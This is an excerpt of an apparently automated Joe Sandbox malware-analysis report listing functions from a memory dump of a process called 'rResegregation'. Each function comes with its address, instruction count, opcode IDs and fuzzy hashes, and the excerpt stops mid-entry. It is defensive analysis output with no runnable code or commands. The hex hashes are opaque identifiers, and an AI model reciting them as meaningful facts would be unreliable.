                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                  • Instruction ID: d7fa8f14f6901ac4d06f090b7e35ba25158653e6266c12aa082c5332ae8416e4
                                                                  • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                  • Instruction Fuzzy Hash: 0CF04F72600208BFE711DBA4DC41FDAB7FCEB08764F104566A965DB180EA70EA40CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783C51D Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59f2fffa4b3a7d9723b0994a750819295e1ef8e54faf9a77c08b6e8a6737356b
                                                                  • Instruction ID: 1543797ef5ab30a3bc863020fc7ff34abaaad94e353949bb47746ed30a3606d8
                                                                  • Opcode Fuzzy Hash: 59f2fffa4b3a7d9723b0994a750819295e1ef8e54faf9a77c08b6e8a6737356b
                                                                  • Instruction Fuzzy Hash: 60F0A4706153049FD314DF28C545B2AB7E4FF58B14F40465AF898DB3C1E638E900C796
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E0774 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                  • Instruction ID: e92140b68f84be8a55143ff4b0230abb91c9803d19f03c4fd284b274f340253b
                                                                  • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                  • Instruction Fuzzy Hash: AEF0B472610204AFE714CB21CC45B56B3EDEF9C760F2484789404DB260FBB5ED10DA14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783C592 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bf4a8ca7051f8d4dfdb83056a137bbd77eae341c12649220644f1296a946abd
                                                                  • Instruction ID: 44cd4c7df221409f809633fc72d89d28df4073fa48ee2bafcbbcf278586be13e
                                                                  • Opcode Fuzzy Hash: 2bf4a8ca7051f8d4dfdb83056a137bbd77eae341c12649220644f1296a946abd
                                                                  • Instruction Fuzzy Hash: E1F04F74A013089FDB04EFA8C559B6EB7F4EF18304F50805AF815EB385DA78EA01CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B471B Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab67559a546e5fc0c4010e78290b9a8d1580bff68a93d4024971d0097846a5fb
                                                                  • Instruction ID: 9a1aea3122fcbaaf4459d234c71097a021e3db162e7db4284b959a94ff44fe55
                                                                  • Opcode Fuzzy Hash: ab67559a546e5fc0c4010e78290b9a8d1580bff68a93d4024971d0097846a5fb
                                                                  • Instruction Fuzzy Hash: FAF052B98013A0AFEF31C724C000B4177EAEB033B0F188C6AC4388F511C334E880C652
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F247 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b8eb5b2093dd0e9d685f89f1cf79c2d0380b8ffc5e436f4b45e7f4b508b5742
                                                                  • Instruction ID: d99adacf905a73fad2ad3cd4afb818f1184f108ca719dc23b9563e68e30c8dbd
                                                                  • Opcode Fuzzy Hash: 2b8eb5b2093dd0e9d685f89f1cf79c2d0380b8ffc5e436f4b45e7f4b508b5742
                                                                  • Instruction Fuzzy Hash: 7CF049B4A10248EFDB04DFA8C549AAEBBF4AF18704F004069E511EB381EA38D900CB55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2539 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                  • Instruction ID: 12c712d99e2cd10aea1208444b91995cdd625f0e90793c502de7d023f7c108ff
                                                                  • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                  • Instruction Fuzzy Hash: E3E092723406402BD7119E598DD8F47779EAFD6710F040479B9045F241CAE79D1982A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EC50D Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23d46af7196e7717f2b181b4f04c396a46be9c0b7acdde634524c53b9f6719df
                                                                  • Instruction ID: d0d3ccf0275db4933a94999a61f2e3021797d4ecb69048dbaee1cd182104da5e
                                                                  • Opcode Fuzzy Hash: 23d46af7196e7717f2b181b4f04c396a46be9c0b7acdde634524c53b9f6719df
                                                                  • Instruction Fuzzy Hash: 0BF0E2FE711790ABE311875CC444B3177DE9B057B4F618965E4098FD11C724E880C685
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F7CF Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29c1c99505022dd9674dd36963ecf4991f1531c3ac44939c99fad26091da9ff7
                                                                  • Instruction ID: a8f8985ceb67420d87b62d6d45dfb19bfdc413a43bcdf216f45b36d9e5f5ed48
                                                                  • Opcode Fuzzy Hash: 29c1c99505022dd9674dd36963ecf4991f1531c3ac44939c99fad26091da9ff7
                                                                  • Instruction Fuzzy Hash: 3BF05E70A11248EBDB04CBA8C54AB9E77F8AF08708F400098E601FB281DA78D9408715
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F717 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1ce7ad6c488cc0762b79cf780ea6f09b4fa3e513cc65e6988015e7fc8234b9a
                                                                  • Instruction ID: d31dc0f3b9a7c59f4d8b8fd69886b9fe6e1deedcfeb5fbe80e34b8a11747cc1b
                                                                  • Opcode Fuzzy Hash: a1ce7ad6c488cc0762b79cf780ea6f09b4fa3e513cc65e6988015e7fc8234b9a
                                                                  • Instruction Fuzzy Hash: A2F08274A11248EFDB04CBA8C94AB9E77F8AF08708F400098F601EF3C1DA78D900C759
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F2AE Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f5e84d767709ade508f38cb91bf19974326fbe37a81268bfffa4cdf8a5d1054c
                                                                  • Instruction ID: 161a44d4b012ce12974f83320d80ed80a62a091d5cc37332b38cdb392d386550
                                                                  • Opcode Fuzzy Hash: f5e84d767709ade508f38cb91bf19974326fbe37a81268bfffa4cdf8a5d1054c
                                                                  • Instruction Fuzzy Hash: 50F08270A11248EFDB04DBE8D55AB9E77F8AF08708F500098E601EF3C1DA78D901CB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E7128 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cd874b999b153609f9ee794b720111291a1d4a70499f0a70f8bf10c4119a73e1
                                                                  • Instruction ID: 905c14273a7b55a5c6fe8ec65972499ab6ec40ad295e00b692f7c46a05351377
                                                                  • Opcode Fuzzy Hash: cd874b999b153609f9ee794b720111291a1d4a70499f0a70f8bf10c4119a73e1
                                                                  • Instruction Fuzzy Hash: 52F0E2769197509FE712CB25C048F45B3D8AB58BF1F0A8464D41C8B902C324ECC0D6A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E174A Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee97884127abd25423d3ac97777ea9e95ed2b8aad243e28ce9fc3c7157a1cd5d
                                                                  • Instruction ID: f9e8dcf0e9f5f444dbd121b0c011c56c8142c7f8009e3de2c69715ac0458739b
                                                                  • Opcode Fuzzy Hash: ee97884127abd25423d3ac97777ea9e95ed2b8aad243e28ce9fc3c7157a1cd5d
                                                                  • Instruction Fuzzy Hash: 4CE092726429216BD3519B18EC05FA6B3AEEBE4A50F1A0435E504DB614DA29DD02C7E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B0630 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                  • Instruction ID: 568a7e0868c742482c93aa41cc22f87003cd833b14b93e2246d995d0bbb807f4
                                                                  • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                  • Instruction Fuzzy Hash: 8EF0E579308348AFEB15CF16C040AD97BE4ABAD3A8F000099EC058F340DB35F851CB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E54E0 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                  • Instruction ID: 4ab61be6e8936bd655cc2be09568b5e9b8c998d06434a60636934779f0ba13f8
                                                                  • Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                  • Instruction Fuzzy Hash: CDE0ED32141719ABD3214A0ADC04F52BB69FB927B1F10822AE9680B9908B64F821CBE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 37883336 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                  • Instruction ID: 74440f423bf56e871141b2ca2f01174c543189407cc39f96ad4b75bc49ffe01a
                                                                  • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                  • Instruction Fuzzy Hash: F5E06D72110200BBE725CB44DD05FEA73ACEB19720F500258B519961D0DBB4FE40C761
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B2500 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f3c1b0fbef24becf6cd76e716a17e19f0e67c4d3d6efd2a4cfe448fa3121b74
                                                                  • Instruction ID: bdf3c0b9fe3e6f357073cbe0fa42403021a517a8758a1ee579a7ef3d90235323
                                                                  • Opcode Fuzzy Hash: 4f3c1b0fbef24becf6cd76e716a17e19f0e67c4d3d6efd2a4cfe448fa3121b74
                                                                  • Instruction Fuzzy Hash: 51E09232101544ABC721EB28DD49F9A7BA9EF54360F104114F1165B1A0CB38AD10C7C5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A81EB Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                  • Instruction ID: d6866c028f987eaa3c9c8909f16a1b72cb7277fb89229fb7cf3d346aacd3ea9c
                                                                  • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                  • Instruction Fuzzy Hash: 3EE08C32051610EEF7725E24DC04F857AA1BF04760F210A6AE1860E6A08BB99C91EA4A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3782E588 Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                  • Instruction ID: 42750e1f6200cb63481205414946f3a75abd4da884aad76e4fffe60df63cc9d7
                                                                  • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                  • Instruction Fuzzy Hash: F6E08C799206809FCF12CF45C644F4AB7B5BF88B00F140008E0089F260C328E900CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EE4BC Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                  • Instruction ID: 24b2afebb6fc21d4c186d2ce69e416eb5f7690451c258056934ff4938289006e
                                                                  • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                  • Instruction Fuzzy Hash: 6ED0A932204610AFD3329E1CFC00FC333E8AB8CB22F020469F008CB050C368EC82C680
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EA750 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                  • Instruction ID: febccef764e416857ea2a71f708b2353d254e91418b21ff3fb176601a944ca85
                                                                  • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                  • Instruction Fuzzy Hash: 92D012371D054DBBCB11DF65DC41F957BA9E799B60F044020F5088B5A0CA3AE950D585
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EC620 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                  • Instruction ID: 27ad61dde812cda7dde9db8a3028b651e0293edb98f307b30d9b98a7a6373765
                                                                  • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                  • Instruction Fuzzy Hash: 4AC08C33290648AFC722DF98DD41F427BA9EB9CB00F000021F3088B670C635FC20EA89
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D0230 Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction ID: 694ff34b3159e71b98eeac6d3afb4a37ca13f1df99bfe9774211908ca5ab2564
                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction Fuzzy Hash: F7D0123610024CEFCB01DF40C854D5A772AFFC8710F109019FD190B6108A35FD62DA50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D332D Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                  • Instruction ID: 878d6c64a3738f82d7969367e7a3ef892e153c1758d2830ed9938994fba66d22
                                                                  • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                  • Instruction Fuzzy Hash: 7CC08CB8141280ABFB1A8B00CE14B283655AB0DB55F80059CEA041D4A1C7AEE8018208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B0670 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
